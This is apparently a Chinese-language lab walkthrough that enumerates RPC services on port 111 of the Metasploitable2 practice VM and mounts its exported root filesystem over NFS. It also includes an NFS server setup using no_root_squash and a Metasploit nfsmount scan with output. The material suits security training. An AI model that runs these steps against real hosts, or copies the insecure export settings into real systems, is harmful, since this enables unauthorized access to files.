Metasploit2: tcp port 111 – rpcbind |
RPC& portmapper (111 TCP + other UDP) portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上的一个函数,并获得返回结果.)反过来也是可行的.如果我想写一个RPC服务,我必须在portmapper处注册它,以便客户端知道服务所监听的端口. 询问portmapper可以知道服务运行在什么端口,这样可以避免端口扫描中遇到的问题,前提是portmapper服务必须运行.因此我想要测试的主机必须先开放111端口.假设一台机器开放portmapper端口,检测结果如下:
|
配置NFS服务 |
实验环境 root@linux:/exports# uname -aLinux linux 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64 GNU/Linux |
切换为root权限 su root 安装所需包应用 apt-get install nfs-kernel-server rpcbind nfs-common vi /etc/default/rpcbind OPTIONS="" vi /etc/hosts.allow # 允许本地网络 192.168.1.0/24 访问 portmap: 192.168.1.0/24 vi /etc/default/nfs-common # NFSv4 需要启动idmapd进程 NEED_IDMAPD=YES vi /etc/idmapd.conf [General] Verbosity = 0 Pipefs-Directory = /var/lib/nfs/rpc_pipefs Domain = localdomain [Mapping] Nobody-User = nobody Nobody-Group = nogroup vi /etc/exports /exports 192.168.1.0/255.255.255.0(rw,no_root_squash,no_subtree_check,crossmnt,fsid=0) mkdir -p /exports/home cd /exports mount --bind /home ./home vi /etc/fstab /home /exports/home none bind /etc/init.d/nfs-kernel-server start /etc/init.d/rpcbind start |
以下为Metasploit 对 Metasploitable2 NFS 的利用过程. |
msf > rpcinfo -p 192.168.1.111 [*] exec: rpcinfo -p 192.168.1.111 program vers proto port service 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 51611 status 100024 1 tcp 40742 status 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100021 1 udp 58205 nlockmgr 100021 3 udp 58205 nlockmgr 100021 4 udp 58205 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100021 1 tcp 39384 nlockmgr 100021 3 tcp 39384 nlockmgr 100021 4 tcp 39384 nlockmgr 100005 1 udp 52933 mountd 100005 1 tcp 52457 mountd 100005 2 udp 52933 mountd 100005 2 tcp 52457 mountd 100005 3 udp 52933 mountd 100005 3 tcp 52457 mountd |
从上面信息中,我们可以看出主机上运行了哪些RPC服务.NFS (Network File System) 服务吸引了我们.也许可以看到该主机的共享,让我们试试: |
root@gnu:~# showmount -a 192.168.1.111 All mount points on 192.168.1.111: 192.168.1.113:/ root@gnu:~# showmount -e 192.168.1.111 Export list for 192.168.1.111: / * root@gnu:~# mount -t nfs 192.168.1.111:/ /mnt/nfs/ -o nolock root@gnu:~# ls /mnt/nfs/ bin cdrom etc initrd lib media nohup.out proc sbin sys usr vmlinuz boot dev home initrd.img lost+found mnt opt root srv tmp var |
Metasploit2: udp port 111 - portmapper |
msf > use auxiliary/scanner/nfs/nfsmount msf auxiliary(nfsmount) > set RHOSTS 192.168.1.111 RHOSTS => 192.168.1.111 msf auxiliary(nfsmount) > run [+] 192.168.1.111 NFS Export: / [*] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
|
推荐链接:
NFS配置: http://tutorialforlinux.com/2013/09/16/how-debian-share-files-over-network-easy-from-server-to-client-on-nfs4/